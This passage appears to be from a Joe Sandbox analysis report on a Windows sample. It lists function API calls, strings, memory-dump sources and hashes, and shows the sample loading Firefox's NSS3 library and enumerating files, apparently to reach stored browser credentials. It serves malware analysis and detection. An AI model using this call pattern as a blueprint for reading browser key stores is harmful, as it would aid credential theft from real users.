                                                                                          • Associated: 00000000.00000002.2520086702.00000000004F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000004FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.0000000000500000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.0000000000587000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000005AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.000000000062C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.000000000063E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID: Heap$Process$AllocName$ComputerExitUser
                                                                                          • String ID:
                                                                                          • API String ID: 1004333139-0
                                                                                          • Opcode ID: 0dde54e68933c144dc9d433c77b62f5ff363c8b2548fcf823f9b9f06c0cc5b37
                                                                                          • Instruction ID: 84cbab3e625f5c703ca2aee7bdcd0b4d96e9050e400d57d2133d1b743e823249
                                                                                          • Opcode Fuzzy Hash: 0dde54e68933c144dc9d433c77b62f5ff363c8b2548fcf823f9b9f06c0cc5b37
                                                                                          • Instruction Fuzzy Hash: 8EE0C27190070222DB2033B66C06B6B329D0B1435DF00052EFA08D7252FE3CF81182AC
                                                                                          Function 004098D0 Relevance: 1.3, APIs: 1, Instructions: 31COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2520086702.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2520086702.000000000043C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.000000000046A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.0000000000493000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.000000000049F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000004C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000004D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000004F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000004FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.0000000000500000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.0000000000587000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000005AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.000000000062C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.000000000063E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID: ??2@
                                                                                          • String ID:
                                                                                          • API String ID: 1033339047-0
                                                                                          • Opcode ID: 1aee106081fe82a84b5a838b5431766f4324473991f19cdffcfc85f73d7ea574
                                                                                          • Instruction ID: 85591d8b2077324c158e0d5cdc0cd752fc6e9f2d8541dbcaab8872a49f7b11e9
                                                                                          • Opcode Fuzzy Hash: 1aee106081fe82a84b5a838b5431766f4324473991f19cdffcfc85f73d7ea574
                                                                                          • Instruction Fuzzy Hash: CFF054B4D00208FBDB00EFA5C946B9EB7B4AB08304F1085A9FD05A7381E6749B00CB95

                                                                                          Non-executed Functions

                                                                                          Function 6CB56E90 Relevance: 142.5, APIs: 71, Strings: 10, Instructions: 783stringmemoryCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • PR_CallOnce.NSS3(6CCA2120,6CB57E60), ref: 6CB56EBC
                                                                                          • TlsGetValue.KERNEL32 ref: 6CB56EDF
                                                                                          • EnterCriticalSection.KERNEL32(?), ref: 6CB56EF3
                                                                                          • PR_WaitCondVar.NSS3(000000FF), ref: 6CB56F25
                                                                                            • Part of subcall function 6CB2A900: TlsGetValue.KERNEL32(00000000,?,6CCA14E4,?,6CAC4DD9), ref: 6CB2A90F
                                                                                            • Part of subcall function 6CB2A900: _PR_MD_WAIT_CV.NSS3(?,?,?), ref: 6CB2A94F
                                                                                          • PR_Unlock.NSS3 ref: 6CB56F68
                                                                                          • PORT_ZAlloc_Util.NSS3(00000008), ref: 6CB56FA9
                                                                                          • TlsGetValue.KERNEL32 ref: 6CB570B4
                                                                                          • EnterCriticalSection.KERNEL32(?), ref: 6CB570C8
                                                                                          • PR_CallOnce.NSS3(6CCA24C0,6CB97590), ref: 6CB57104
                                                                                          • PR_SetError.NSS3(FFFFE013,00000000), ref: 6CB57117
                                                                                          • SECOID_Init.NSS3 ref: 6CB57128
                                                                                          • PORT_Alloc_Util.NSS3(00000057), ref: 6CB5714E
                                                                                          • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6CB5717F
                                                                                          • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6CB571A9
                                                                                          • PR_NotifyAllCondVar.NSS3 ref: 6CB571CF
                                                                                          • PR_Unlock.NSS3 ref: 6CB571DD
                                                                                          • free.MOZGLUE(?), ref: 6CB571EE
                                                                                          • PR_SetError.NSS3(FFFFE013,00000000), ref: 6CB57208
                                                                                          • free.MOZGLUE(00000000), ref: 6CB57221
                                                                                          • free.MOZGLUE(00000001), ref: 6CB57235
                                                                                          • TlsGetValue.KERNEL32 ref: 6CB5724A
                                                                                          • EnterCriticalSection.KERNEL32(?), ref: 6CB5725E
                                                                                          • PR_NotifyCondVar.NSS3 ref: 6CB57273
                                                                                          • PR_Unlock.NSS3 ref: 6CB57281
                                                                                          • SECMOD_DestroyModule.NSS3(00000000), ref: 6CB57291
                                                                                          • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6CB572B1
                                                                                          • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6CB572D4
                                                                                          • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6CB572E3
                                                                                          • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6CB57301
                                                                                          • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6CB57310
                                                                                          • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6CB57335
                                                                                          • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6CB57344
                                                                                          • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6CB57363
                                                                                          • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6CB57372
                                                                                          • PR_smprintf.NSS3(name="%s" parameters="configdir='%s' certPrefix='%s' keyPrefix='%s' secmod='%s' flags=%s updatedir='%s' updateCertPrefix='%s' updateKeyPrefix='%s' updateid='%s' updateTokenDescription='%s' %s" NSS="flags=internal,moduleDB,moduleDBOnly,critical%s",NSS Internal Module,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,?,00000000,6CC90148,,defaultModDB,internalKeySlot), ref: 6CB574CC
                                                                                          • free.MOZGLUE(00000000), ref: 6CB57513
                                                                                          • free.MOZGLUE(00000000), ref: 6CB5751B
                                                                                          • free.MOZGLUE(00000000), ref: 6CB57528
                                                                                          • free.MOZGLUE(00000000), ref: 6CB5753C
                                                                                          • free.MOZGLUE(00000000), ref: 6CB57550
                                                                                          • free.MOZGLUE(00000000), ref: 6CB57561
                                                                                          • free.MOZGLUE(00000000), ref: 6CB57572
                                                                                          • free.MOZGLUE(00000000), ref: 6CB57583
                                                                                          • free.MOZGLUE(00000000), ref: 6CB57594
                                                                                          • free.MOZGLUE(00000000), ref: 6CB575A2
                                                                                          • SECMOD_LoadModule.NSS3(00000000,00000000,00000001), ref: 6CB575BD
                                                                                          • free.MOZGLUE(00000000), ref: 6CB575C8
                                                                                          • free.MOZGLUE(00000000), ref: 6CB575F1
                                                                                          • PR_NewLock.NSS3 ref: 6CB57636
                                                                                          • SECMOD_DestroyModule.NSS3(00000000), ref: 6CB57686
                                                                                          • PR_NewLock.NSS3 ref: 6CB576A2
                                                                                            • Part of subcall function 6CC098D0: calloc.MOZGLUE(00000001,00000084,6CB30936,00000001,?,6CB3102C), ref: 6CC098E5
                                                                                          • PORT_ZAlloc_Util.NSS3(00000050), ref: 6CB576B6
                                                                                          • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,sql:,00000004), ref: 6CB57707
                                                                                          • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,dbm:,00000004), ref: 6CB5771C
                                                                                          • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,extern:,00000007), ref: 6CB57731
                                                                                          • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,rdb:,00000004), ref: 6CB5774A
                                                                                          • DeleteCriticalSection.KERNEL32(?), ref: 6CB57770
                                                                                          • free.MOZGLUE(?), ref: 6CB57779
                                                                                          • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6CB5779A
                                                                                          • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6CB577AC
                                                                                          • PORT_Alloc_Util.NSS3(-0000000D), ref: 6CB577C4
                                                                                          • memcpy.VCRUNTIME140(00000000,?,00000000), ref: 6CB577DB
                                                                                          • strrchr.VCRUNTIME140(?,0000002F), ref: 6CB57821
                                                                                          • PORT_Alloc_Util.NSS3(?), ref: 6CB57837
                                                                                          • memcpy.VCRUNTIME140(00000000,00000000,00000000), ref: 6CB5785B
                                                                                          • memcpy.VCRUNTIME140(00000000,?,00000000), ref: 6CB5786F
                                                                                          • SECMOD_AddNewModuleEx.NSS3 ref: 6CB578AC
                                                                                          • free.MOZGLUE(00000000), ref: 6CB578BE
                                                                                          • SECMOD_AddNewModuleEx.NSS3 ref: 6CB578F3
                                                                                          • free.MOZGLUE(00000000), ref: 6CB578FC
                                                                                          • free.MOZGLUE(00000000), ref: 6CB5791C
                                                                                            • Part of subcall function 6CB307A0: TlsGetValue.KERNEL32(00000000,?,?,?,?,6CAC204A), ref: 6CB307AD
                                                                                            • Part of subcall function 6CB307A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6CAC204A), ref: 6CB307CD
                                                                                            • Part of subcall function 6CB307A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6CAC204A), ref: 6CB307D6
                                                                                            • Part of subcall function 6CB307A0: calloc.MOZGLUE(00000001,00000144,?,?,?,?,6CAC204A), ref: 6CB307E4
                                                                                            • Part of subcall function 6CB307A0: TlsSetValue.KERNEL32(00000000,?,6CAC204A), ref: 6CB30864
                                                                                            • Part of subcall function 6CB307A0: calloc.MOZGLUE(00000001,0000002C), ref: 6CB30880
                                                                                            • Part of subcall function 6CB307A0: TlsSetValue.KERNEL32(00000000,?,?,6CAC204A), ref: 6CB308CB
                                                                                            • Part of subcall function 6CB307A0: TlsGetValue.KERNEL32(?,?,6CAC204A), ref: 6CB308D7
                                                                                            • Part of subcall function 6CB307A0: TlsGetValue.KERNEL32(?,?,6CAC204A), ref: 6CB308FB
                                                                                          Strings
                                                                                          • Spac, xrefs: 6CB57389
                                                                                          • rdb:, xrefs: 6CB57744
                                                                                          • name="%s" parameters="configdir='%s' certPrefix='%s' keyPrefix='%s' secmod='%s' flags=%s updatedir='%s' updateCertPrefix='%s' updateKeyPrefix='%s' updateid='%s' updateTokenDescription='%s' %s" NSS="flags=internal,moduleDB,moduleDBOnly,critical%s", xrefs: 6CB574C7
                                                                                          • kbi., xrefs: 6CB57886
                                                                                          • NSS Internal Module, xrefs: 6CB574A2, 6CB574C6
                                                                                          • sql:, xrefs: 6CB576FE
                                                                                          • ,defaultModDB,internalKeySlot, xrefs: 6CB5748D, 6CB574AA
                                                                                          • extern:, xrefs: 6CB5772B
                                                                                          • dbm:, xrefs: 6CB57716
                                                                                          • dll, xrefs: 6CB5788E
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2584650252.000000006CAC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CAC0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2584502257.000000006CAC0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2587628478.000000006CC5F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2588211945.000000006CC9E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2588577558.000000006CC9F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2588804553.000000006CCA0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2589242943.000000006CCA5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6cac0000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID: free$strlen$Value$Alloc_ModuleUtil$CriticalSectionstrncmp$CondEnterUnlockcallocmemcpy$CallDestroyErrorLockNotifyOnce$DeleteInitLoadR_smprintfWaitstrrchr
                                                                                          • String ID: ,defaultModDB,internalKeySlot$NSS Internal Module$Spac$dbm:$dll$extern:$kbi.$name="%s" parameters="configdir='%s' certPrefix='%s' keyPrefix='%s' secmod='%s' flags=%s updatedir='%s' updateCertPrefix='%s' updateKeyPrefix='%s' updateid='%s' updateTokenDescription='%s' %s" NSS="flags=internal,moduleDB,moduleDBOnly,critical%s"$rdb:$sql:
                                                                                          • API String ID: 3465160547-3797173233
                                                                                          • Opcode ID: ca3bd3a902637b3025fee4b41e915848e70f131ec11de43fcffc243961cabe97
                                                                                          • Instruction ID: 1ee35024783d35b08323a8d3df1a5b669ef41a2e0a243d9f3983f9627dbeca56
                                                                                          • Opcode Fuzzy Hash: ca3bd3a902637b3025fee4b41e915848e70f131ec11de43fcffc243961cabe97
                                                                                          • Instruction Fuzzy Hash: C65215B1E112919BEF118FA5DC0979E7BB4EF05308F548028ED09B7B41EBB1D964CB92
                                                                                          Function 6CA36C80 Relevance: 95.2, APIs: 50, Strings: 4, Instructions: 727encryptionfileCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • CryptQueryObject.CRYPT32(00000001,?,00000400,00000002,00000000,?,?,?,?,?,00000000), ref: 6CA36CCC
                                                                                          • CryptMsgGetParam.CRYPT32(00000000,00000007,00000000,00000000,0000000C), ref: 6CA36D11
                                                                                          • moz_xmalloc.MOZGLUE(0000000C), ref: 6CA36D26
                                                                                            • Part of subcall function 6CA3CA10: malloc.MOZGLUE(?), ref: 6CA3CA26
                                                                                          • memset.VCRUNTIME140(00000000,00000000,0000000C), ref: 6CA36D35
                                                                                          • CryptMsgGetParam.CRYPT32(00000000,00000007,00000000,00000000,0000000C), ref: 6CA36D53
                                                                                          • CertFindCertificateInStore.CRYPT32(00000000,00010001,00000000,000B0000,00000000,00000000), ref: 6CA36D73
                                                                                          • free.MOZGLUE(00000000), ref: 6CA36D80
                                                                                          • CertGetNameStringW.CRYPT32 ref: 6CA36DC0
                                                                                          • moz_xmalloc.MOZGLUE(00000000), ref: 6CA36DDC
                                                                                          • memset.VCRUNTIME140(00000000,00000000,00000000), ref: 6CA36DEB
                                                                                          • CertGetNameStringW.CRYPT32(00000000,00000004,00000000,00000000,00000000,00000000), ref: 6CA36DFF
                                                                                          • CertFreeCertificateContext.CRYPT32(00000000), ref: 6CA36E10
                                                                                          • CryptMsgClose.CRYPT32(00000000), ref: 6CA36E27
                                                                                          • CertCloseStore.CRYPT32(00000000,00000000), ref: 6CA36E34
                                                                                          • CreateFileW.KERNEL32 ref: 6CA36EF9
                                                                                          • moz_xmalloc.MOZGLUE(00000000), ref: 6CA36F7D
                                                                                          • memset.VCRUNTIME140(00000000,00000000,00000000), ref: 6CA36F8C
                                                                                          • memset.VCRUNTIME140(00000002,00000000,00000208), ref: 6CA3709D
                                                                                          • CryptQueryObject.CRYPT32(00000001,00000002,00000400,00000002,00000000,?,?,?,?,?,00000000), ref: 6CA37103
                                                                                          • free.MOZGLUE(00000000), ref: 6CA37153
                                                                                          • CloseHandle.KERNEL32(?), ref: 6CA37176
                                                                                          • __Init_thread_footer.LIBCMT ref: 6CA37209
                                                                                          • __Init_thread_footer.LIBCMT ref: 6CA3723A
                                                                                          • __Init_thread_footer.LIBCMT ref: 6CA3726B
                                                                                          • __Init_thread_footer.LIBCMT ref: 6CA3729C
                                                                                          • __Init_thread_footer.LIBCMT ref: 6CA372DC
                                                                                          • __Init_thread_footer.LIBCMT ref: 6CA3730D
                                                                                          • memset.VCRUNTIME140(?,00000000,00000110), ref: 6CA373C2
                                                                                          • VerSetConditionMask.NTDLL ref: 6CA373F3
                                                                                          • VerSetConditionMask.NTDLL ref: 6CA373FF
                                                                                          • VerSetConditionMask.NTDLL ref: 6CA37406
                                                                                          • VerSetConditionMask.NTDLL ref: 6CA3740D
                                                                                          • VerifyVersionInfoW.KERNEL32(?,00000033,00000000), ref: 6CA3741A
                                                                                          • moz_xmalloc.MOZGLUE(?), ref: 6CA3755A
                                                                                          • memset.VCRUNTIME140(00000000,00000000,?), ref: 6CA37568
                                                                                          • CryptBinaryToStringW.CRYPT32(00000000,00000000,4000000C,00000000,?), ref: 6CA37585
                                                                                          • _wcsupr_s.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?), ref: 6CA37598
                                                                                          • free.MOZGLUE(00000000), ref: 6CA375AC
                                                                                            • Part of subcall function 6CA5AB89: EnterCriticalSection.KERNEL32(6CAAE370,?,?,?,6CA234DE,6CAAF6CC,?,?,?,?,?,?,?,6CA23284), ref: 6CA5AB94
                                                                                            • Part of subcall function 6CA5AB89: LeaveCriticalSection.KERNEL32(6CAAE370,?,6CA234DE,6CAAF6CC,?,?,?,?,?,?,?,6CA23284,?,?,6CA456F6), ref: 6CA5ABD1
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2582767178.000000006CA21000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CA20000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2582603888.000000006CA20000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2583329160.000000006CA9D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2584183134.000000006CAAE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2584334856.000000006CAB2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6ca20000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID: CryptInit_thread_footermemset$Cert$ConditionMaskmoz_xmalloc$CloseStringfree$CertificateCriticalNameObjectParamQuerySectionStore$BinaryContextCreateEnterFileFindFreeHandleInfoLeaveVerifyVersion_wcsupr_smalloc
                                                                                          • String ID: ($CryptCATAdminReleaseCatalogContext$SHA256$wintrust.dll
                                                                                          • API String ID: 3256780453-3980470659
                                                                                          • Opcode ID: 2c58cd9b9a0a633ad406248a2a3f089a9cffdaed92cd36a8a16cec62e4d07689
                                                                                          • Instruction ID: 696b2e15739ea8e0d9009db5a94021f19421a679501f90f581b1a3717769ee1f
                                                                                          • Opcode Fuzzy Hash: 2c58cd9b9a0a633ad406248a2a3f089a9cffdaed92cd36a8a16cec62e4d07689
                                                                                          • Instruction Fuzzy Hash: 3052E471A00326DBEB299F64CD94BAA77B8FB49704F149199E40DD7640DB30AEC5CFA0
                                                                                          Function 6CA834A0 Relevance: 61.0, APIs: 33, Strings: 1, Instructions: 1467COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6CA83527
                                                                                          • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6CA8355B
                                                                                          • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6CA835BC
                                                                                          • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6CA835E0
                                                                                          • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6CA8363A
                                                                                          • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6CA83693
                                                                                          • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6CA836CD
                                                                                          • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6CA83703
                                                                                          • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6CA8373C
                                                                                          • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6CA83775
                                                                                          • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6CA8378F
                                                                                          • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6CA83892
                                                                                          • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6CA838BB
                                                                                          • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6CA83902
                                                                                          • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6CA83939
                                                                                          • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6CA83970
                                                                                          • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6CA839EF
                                                                                          • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6CA83A26
                                                                                          • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6CA83AE5
                                                                                          • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6CA83E85
                                                                                          • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6CA83EBA
                                                                                          • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6CA83EE2
                                                                                            • Part of subcall function 6CA86180: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000024), ref: 6CA861DD
                                                                                            • Part of subcall function 6CA86180: memcpy.VCRUNTIME140(00000000,00000024,-00000070), ref: 6CA8622C
                                                                                          • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6CA840F9
                                                                                          • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6CA8412F
                                                                                          • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6CA84157
                                                                                            • Part of subcall function 6CA86180: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000001), ref: 6CA86250
                                                                                            • Part of subcall function 6CA86180: free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6CA86292
                                                                                          • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6CA8441B
                                                                                          • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6CA84448
                                                                                          • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 6CA8484E
                                                                                          • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 6CA84863
                                                                                          • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 6CA84878
                                                                                          • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 6CA84896
                                                                                          • free.MOZGLUE ref: 6CA8489F
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2582767178.000000006CA21000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CA20000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2582603888.000000006CA20000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2583329160.000000006CA9D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2584183134.000000006CAAE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2584334856.000000006CAB2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6ca20000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID: floor$free$malloc$memcpy
                                                                                          • String ID:
                                                                                          • API String ID: 3842999660-3916222277
                                                                                          • Opcode ID: cdb3231efbbbb5a8ed9a88a38e3729609b79992a28299683e2b2b4ae6c46b943
                                                                                          • Instruction ID: c58c7b395ad98e841ecdf87269e8932af2e71992d97879b0c86598072b0b3aa6
                                                                                          • Opcode Fuzzy Hash: cdb3231efbbbb5a8ed9a88a38e3729609b79992a28299683e2b2b4ae6c46b943
                                                                                          • Instruction Fuzzy Hash: 0CF26874909B81CFC325CF28C19469AFBF1FF8A308F158A5ED98997711DB319896CB42
                                                                                          Function 6CB66D90 Relevance: 60.3, APIs: 33, Strings: 1, Instructions: 809COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • memcpy.VCRUNTIME140(?,6CC6A8EC,0000006C), ref: 6CB66DC6
                                                                                          • memcpy.VCRUNTIME140(?,6CC6A958,0000006C), ref: 6CB66DDB
                                                                                          • memcpy.VCRUNTIME140(?,6CC6A9C4,00000078), ref: 6CB66DF1
                                                                                          • memcpy.VCRUNTIME140(?,6CC6AA3C,0000006C), ref: 6CB66E06
                                                                                          • memcpy.VCRUNTIME140(?,6CC6AAA8,00000060), ref: 6CB66E1C
                                                                                          • PR_SetError.NSS3(FFFFE005,00000000), ref: 6CB66E38
                                                                                            • Part of subcall function 6CBEC2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6CBEC2BF
                                                                                          • PK11_DoesMechanism.NSS3(?,?), ref: 6CB66E76
                                                                                          • TlsGetValue.KERNEL32 ref: 6CB6726F
                                                                                          • EnterCriticalSection.KERNEL32(?), ref: 6CB67283
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2584650252.000000006CAC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CAC0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2584502257.000000006CAC0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2587628478.000000006CC5F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2588211945.000000006CC9E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2588577558.000000006CC9F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2588804553.000000006CCA0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2589242943.000000006CCA5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6cac0000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID: memcpy$Value$CriticalDoesEnterErrorK11_MechanismSection
                                                                                          • String ID: !
                                                                                          • API String ID: 3333340300-2657877971
                                                                                          • Opcode ID: 6ca16e3a249ec9b3355ad1eca465939e094bb08f224d3a349cd26ce93988cef2
                                                                                          • Instruction ID: 34b57248f9ac211fd6aa46a03ba21adfb33c2b578d8a590af0cd81c33aeabf03
                                                                                          • Opcode Fuzzy Hash: 6ca16e3a249ec9b3355ad1eca465939e094bb08f224d3a349cd26ce93988cef2
                                                                                          • Instruction Fuzzy Hash: FE729DB5D052589FDF20CF29CC8879ABBB4EF49304F1441A9D80DA7B41EB71AA85CF91
                                                                                          Function 004133C0 Relevance: 49.2, APIs: 20, Strings: 8, Instructions: 250filestringCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • wsprintfA.USER32 ref: 004133DC
                                                                                          • FindFirstFileA.KERNEL32(?,?), ref: 004133F3
                                                                                          • lstrcat.KERNEL32(?,?), ref: 00413445
                                                                                          • StrCmpCA.SHLWAPI(?,00420F40), ref: 00413457
                                                                                          • StrCmpCA.SHLWAPI(?,00420F44), ref: 0041346D
                                                                                          • FindNextFileA.KERNEL32(000000FF,?), ref: 00413777
                                                                                          • FindClose.KERNEL32(000000FF), ref: 0041378C
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2520086702.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2520086702.000000000043C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.000000000046A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.0000000000493000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.000000000049F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000004C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000004D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000004F1000.00000040.00000001.01000000.00000003.sdmpDownload File
